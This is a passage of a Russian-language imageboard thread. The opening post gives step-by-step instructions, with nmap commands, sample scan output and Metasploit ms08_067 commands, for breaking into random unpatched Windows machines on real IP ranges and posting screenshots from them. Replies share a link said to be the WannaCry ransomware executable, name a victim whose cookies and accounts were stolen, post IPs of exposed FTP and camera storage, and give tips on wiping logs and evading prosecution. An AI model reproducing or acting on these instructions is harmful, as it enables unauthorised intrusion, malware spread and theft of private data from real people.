Сап х@рk@4 ! Х@kеP0v тред.Задание - пилим скрины, интересные фото и тп со взломаных ПК/Серверов/Облачных хранилищ/Web КАМЕРИнструкция: качаем nmap и metasploitСоздадим папку скан.В ней:создадим файл ips.txt со списком диапазонов ip адресовВ терминалеnmap -p 21,139,445,145 --open --script smb-vuln-ms17-010,smb-vuln-ms10-061,smb-vuln-ms10-054,smb-vuln-ms08-067,smb-vuln-ms07-029,smb-vuln-ms06-025,smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,ftp-vsftpd-backdoor,ftp-proftpd-backdoor,ftp-anon -T4 -iL ips.txt -oN out.txtВсе данные будут переть в out.txtТам ищем что-то похожее на Nmap scan report for 5-248-21-106.broadband.kyivstar.net (5.248.21.106)Host is up (0.018s latency).Not shown: 2 closed ports, 1 filtered portSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE445/tcp open microsoft-dsHost script results:| smb-vuln-ms08-067: | VULNERABLE:| Microsoft Windows system vulnerable to remote code execution (MS08-067)| State: LIKELY VULNERABLE| IDs: CVE:CVE-2008-4250| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary| code via a crafted RPC request that triggers the overflow during path canonicalization.| | Disclosure date: 2008-10-23| References:| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250|_smb-vuln-ms10-054: false|_smb-vuln-ms10-061: false| smb-vuln-ms17-010: | VULNERABLE:| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)| State: VULNERABLE| IDs: CVE:CVE-2017-0143| Risk factor: HIGH| A critical remote code execution vulnerability exists in Microsoft SMBv1| servers (ms17-010).| | Disclosure date: 2017-03-14| References:| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/Отсюда мы выпиливаем ip и имя дырки smb-vuln-ms08-067Открываем метасплоитsearch mb-vuln-ms08-067use exploit/windows/smb/ms08_067_netapiset rhost 5.248.21.106run!?!?!?!??!?!?!?!?PROFIT?!?!?!??!?!?!Ё?!??!?!Если увидели meterpreter > Вы внутри.Если нет ищите другой комп.Стартуем!
Все в тихий дом, нетсталкер на дваче
Как хакир видит сибя и как хакир выглядет на самам дели
скрин с еще одного взломаного компа
>>172929526кинь шифровальщик wannacry)))
>>172929741https://transfer.sh/12unMp/CYBERed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.EXE
>>172930334>https://transfer.sh/12unMp/CYBERed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.EXEСяпки)))) это точно тот самый вирус?))
>>172927785Там, похоже, кто-то слабовидящий.
>>172930486Да, точно тот самый вирус. Я им чуть себе хомяк не зашифровал.
>>172930537Валерий Данилович его зовут он с хохленда)))Слил куки с его кома. Там майл акк и акк фэйсбука был)
>>172930603спасиб бро)
И нахуя вам это?Зарепортил.
>>172930658просто так
мож на комп залить архив гей порно?)
>>172927027 (OP)загугли что такое скрипткидди, скрипткидди
Че за хуйня? Я запускаю сплоит. Он дает сессию метерпретер, через пару сек сессия обрывается и больше подкл не могу
Скрина моего экрана пока нет. Это хорошо.
>>172927027 (OP)Хуйня Вирусопичатель-одиночка
>>172935411>Вирусопичатель-одиночкаТак и запишем...
Скачал в сети русский пул адресов. Попробуем что там ОП наобещал.
Пока везде:Host script results:|_smb-vuln-ms10-054: false|_smb-vuln-ms10-061: false
>>172936897 это не дырявые сервы. Жди
>>172935630Я ни с кем не сотрудничаю, тов.майор
>>172937179Это всё проход host-*.pppoe.omsknet.ru
>>172937179В Украине быстро нашлись уязвимые сервисы.
Первый раз в жизни запустил msfconsole. Для него нужно поднимать и настраивать PostgreSQL или продолжить использовать так?
Нет smb-vuln-cve2009-3103 в Metasploit...
>>172939448Host script results:| smb-vuln-cve2009-3103: | VULNERABLE:| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)| State: VULNERABLE| IDs: CVE:CVE-2009-3103| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,| aka "SMBv2 Negotiation Vulnerability."| | Disclosure date: 2009-09-08| References:| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103|_smb-vuln-ms10-054: false|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
>>172939501Nmap scan report for 5.53.118.50Host is up (0.084s latency).Not shown: 3 closed portsPORT STATE SERVICE139/tcp open netbios-ssn
>>172927027 (OP)>со списком диапазонов ip адресовсо списком диапазонов как раз не работает
>>172927027 (OP)Ты по каким материалам учился? Тоже хочу стать какером
>>172939682А ты списочек правильно подавай.Пример: 5.1.0.0/19
>>172939857Можешь несколько подобных подсетей задавать. Только пробел между ними ставь. А без -iL можно ip прямо в консоль подавать.
>>172939700Плиз не игнорь, бамп реквесту
>>172939937Я не ОП треда.
>>172939250и без него можно
>>172939700Linux умеешь использовать?
>>172939937>>172939700англоютуб
эээээ блдядь вы как мой рабочий стол сфотакали????!!!!!
Кстати ОП, а чем лучше всего под Linux'ом (можно через Wine) открывать найденный вебки?
>>172940078Нет пока, я скачал курс по информационной безопасности вчера. Секреты Хакеров называется, пока выучил первые три части, но там только теория, практика (в том числе ganu linux) ближе к концу. Что про линукс посоветуешь?
>>172940016И я не ОП. Так что извини, не подскажу
>>172940109Хуево, я немецкий учил. Надо на инглиш пепеходить
>>172940227Да я ничего не могу тебе подсказать. Тебе бы надо с ОПом связаться. Он подскажет думаю. Он вроде грамотный чувак-то
ghjgecr d extremepron
>>172940227Ставь линукс на свой кудахтер пополняй клуб прыщеводов)))
>>172940227Я просто как вышла 8-ка укатился на Ubuntu, затем на Linux Mint, потом был Manjaro и сейчас уже 4 года на Arch Linux.Просто если ты хоть немного попользуешься Linux'ом как основной системой, то современем даже Windows начинаешь лучше понимать.
>>172940317я оп
>>172940403>>172940415Какой дистрибутив для новичка подойдет?
>>172940490Минт
>>172940490Для просто исп - DeepinДля исп и работы - Ubuntu/MintДля взлома Kali но я исп MintВ принципе в дистрибутивы похожи, и там все одинаково, разница в пакетах предустановленных и оболочке
>>172940490Ubuntu за множество гайдов и инструкций к ней.
>>172940490https://ru.wikipedia.org/wiki/Ubuntu#%D0%94%D0%B8%D1%81%D1%82%D1%80%D0%B8%D0%B1%D1%83%D1%82%D0%B8%D0%B2%D1%8B_Linux,_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D0%B0%D0%BD%D0%BD%D1%8B%D0%B5_%D0%BD%D0%B0_UbuntuВыбирай.
>>172940653Секрет прост - гайды от бубунты катят на mint или любой др дистрибутив и наоборот. Потому что это сук линукс. Мимо прыщевод с 4 уровневым стажем
>>172940653>>172940650>>172940516>>172940717Всем спасибо за ответы
>>172940791Просто Linux Mint вносит дополнительные особенности для понимания. Пользователь должен сам перейти от Ubuntu к другим дистрам после оценки своих потребностей.
>>172927027 (OP)Я что-то гляжу, по этим уязвимостям не попасть на комп с последними обновами. Может кто подкинуть ссыль, где можно свежие эксплойты найти?
>>172940963ну, да, все сперва бубунту ставили) ктот на ней до сих пор) Можно минт сразу ставить, он в исп простой и на винду похож. Для фанатов эпл deepin
Холодец за щеку этой шкуре
>>172940791И не забываем про это:https://www.opennet.ru/opennews/art.shtml?num=43915https://www.opennet.ru/opennews/art.shtml?num=38456
>>172941023угощайтес https://www.exploit-db.com/Хз-хз у меня сканер дохуя дырявых компов дал, мне прост чекать надоело) зава продолжу)
>>172941083>https://www.opennet.ru/opennews/art.shtml?num=43915ничоси над чекнуть свой комп
>>1729413615.1.0.88
>>172941361на чье облако кинул?))) И че там?)
>>172941419Хз. Просто гулял по ftp-шникам и наткнулся на это.
Слышьте хацкеры, как на винде 8 настроить чтобы рабочий стол был статичен на 2х мониторах с 2мя разными обоинами. Как только выбираю 2 обоины включается режим слайд-шоу.Да, меня унижает мой же ПК
А вот тут мне удалось создать папку. Кейс атаки следующий: кидаем ему патченную версию Хрома для Android.
>>172941598Не буду палить адрес. Теперь надо только научиться модифицировать apk-шки и освоить программирование под Android.
>>172941086>Хз-хз у меня сканер дохуя дырявых компов дал, мне прост чекать надоело) зава продолжу)Так тебе же всяких унылых рандомов выдаёт. А если на определённый комп надо?
Как там скрипткидди итт поживают? На школьные кудахтеры ратники поставили уже? Я вот да.
>>172941685определенный труднее, тут соц инженерия нужна, троянчика подкинуть, ну там ссылка на сайт, письмо на мыло, иногда помогает флэшку у двери кинуть)))
>>172941936збсь)
шо за хуйня тут происходит?
>>172942111клуб кулц хацкеров ур скрипт кидди.Кто взламывет компы украинских бабулек, кто видео сервера, кто веб камеры ноутов))))
Бл, жаль уже не найду, сохранять над былО) там огромный архив порнухи)))
>>172942606мы тут что всем тредом украинские ип сканим?...
>>172942668Ага. Только мне не слишком завидно. Что-то мне хочется прочитать что-нибудь про хакерскую этику.
Meterpreter устаревшее говно. Юзай Empire. А твоя самба - туда же. Есть FuzzBunch. Мимо-тот-самый-кун-эксплоит-рдот
Ммм
>>172927027 (OP)как обезопасить себя?запили гайд
>>172942770Какая этика это двач)
>>172943089Вовремя ставить обновления системы и завести keepasx для паролей.
>>172943167я не в этом смысле)как обезопасить себя от наказания)
>>172943089как обезопасить себя от наказания*?фикс
>>172943030Moar --> ftp 5.104.56.157/mmcblk0p1/SD_VIDEO/PRL001
>>172943219proxychains+hidemy.nameИли VPN
>>172943219VPN и не трогать граждан своей страны.
>>172943187>>172943219VPN. Я так вообще еще и по ssh к серву подрубаюсь и удаленно все делаю) Можно еще логи чистить. А брат фсб всеравно тя пасет. Это норма.
>>172940490зюзя.
Верните мне мой 2015...
>>1729432841. Не пиздить деньги.2. Не вредить компу.3. Не ломать граждан своей страны4. VPN5. Чистить логи на удаленном хосте/взломанном пк6. Исп LiveUSB ос например кали и грузится онли через флэху. Ибо вся инфа хранится в оперативе и после перезагрузки стирается без шанса на восстановление
СУКА! ГОРИЗОНТ ЗАВАЛИЛА!!!
>>1729434455.104.60.64
>>172943445бля редко тян нахожу((
>>172943479Проверено. ЦП нет.
>>172943554а хотелось
Это братцы ностальгия
>>172943677я до сих пор джабером пользуюсь. У меня на удаленном хосте сервер жабы стоит)
забавно во взломе самое важное - опыт. Чем больше опыта, тем больше шансов взломать. Когда начинал я мог день на сканирование диапозона потратить и не взломать ни одного хоста. Теперь за 30 мин 4 хоста вскрываю)
Эх, были люди в наше время...
какие профиты с этого поиметь можно? Вот взламываю комп а цели то нету. Максимум скрин сделаю или порно залью на раб стол...
>>172943808А что изменилось, если ты что тогда, что сейчас действуешь по одному сценарию
Как наши предки жили так долго вместе?
>>172940403>минт>яндекс-браузер
Плюх!
>>172943902тогда я знал только один способ проникнуть. Теперь кучу. Вообще мышление изменилось.
>>172943433как чистить логи на взломанном пк?
Сяомипидор в треде
>>172944122в ручную, это от оооочень многого зависит, где как и когда следил, какая ос, версия, дырка, сплоит, полезная нагрузка и тп. Универсального способа нет. Да и надо оно тебе. Среднестатистический продвинутый юзер пеки не знает даж где они лежат
>>172927027 (OP)Объясните далекому от этой темы, почему smb так активно не эксплуатировался до последней найденной уязвимости.
>>172944344Потому что в сеть проник не proof-of-concept, а сразу готовый эксплоит.
>>172944344всегда исп, просто етерналблю шуму с ваннакраем наделала)
У тебя никогда не будет такой няши.
Сейчас бы со своего пк сканить мммм кайфФарму в массы abc
>>172944757ЦЕРКОВЬ ТNРЕЧА призываю тебя в тред дабы исправить сию фотографию.
Бамп хакерам
Вот вам лолю и копателя, бамп.
>>172941598Ньюфажный вопросКак создать на чужом ftp папку?
>>172948210пкм → создать папку ))))0
может кто-то vpn посоветует?
>>172927027 (OP)Где качать metasploit , браузер отказывается, пишет что вирусный и опасный.
>>172942848> 3 пик> даже у него есть тян> тян беспалевно держит ероху за рукуТеперь это баттхерт тред, лол.
>>172948946Родственник или тайный ёбырь
>>172948978А омежка как такую тян заимел?Или это стандарт в Хохлостане?
>>172949090Действительно странно.
>>172927027 (OP)Ебать дебил, в 2018 искать дыру 15-летней давности
>>172927027 (OP)Как папку скан создать?
>>172949179>это отрицание объективной реальности данной нам в ощущенияхна мониторе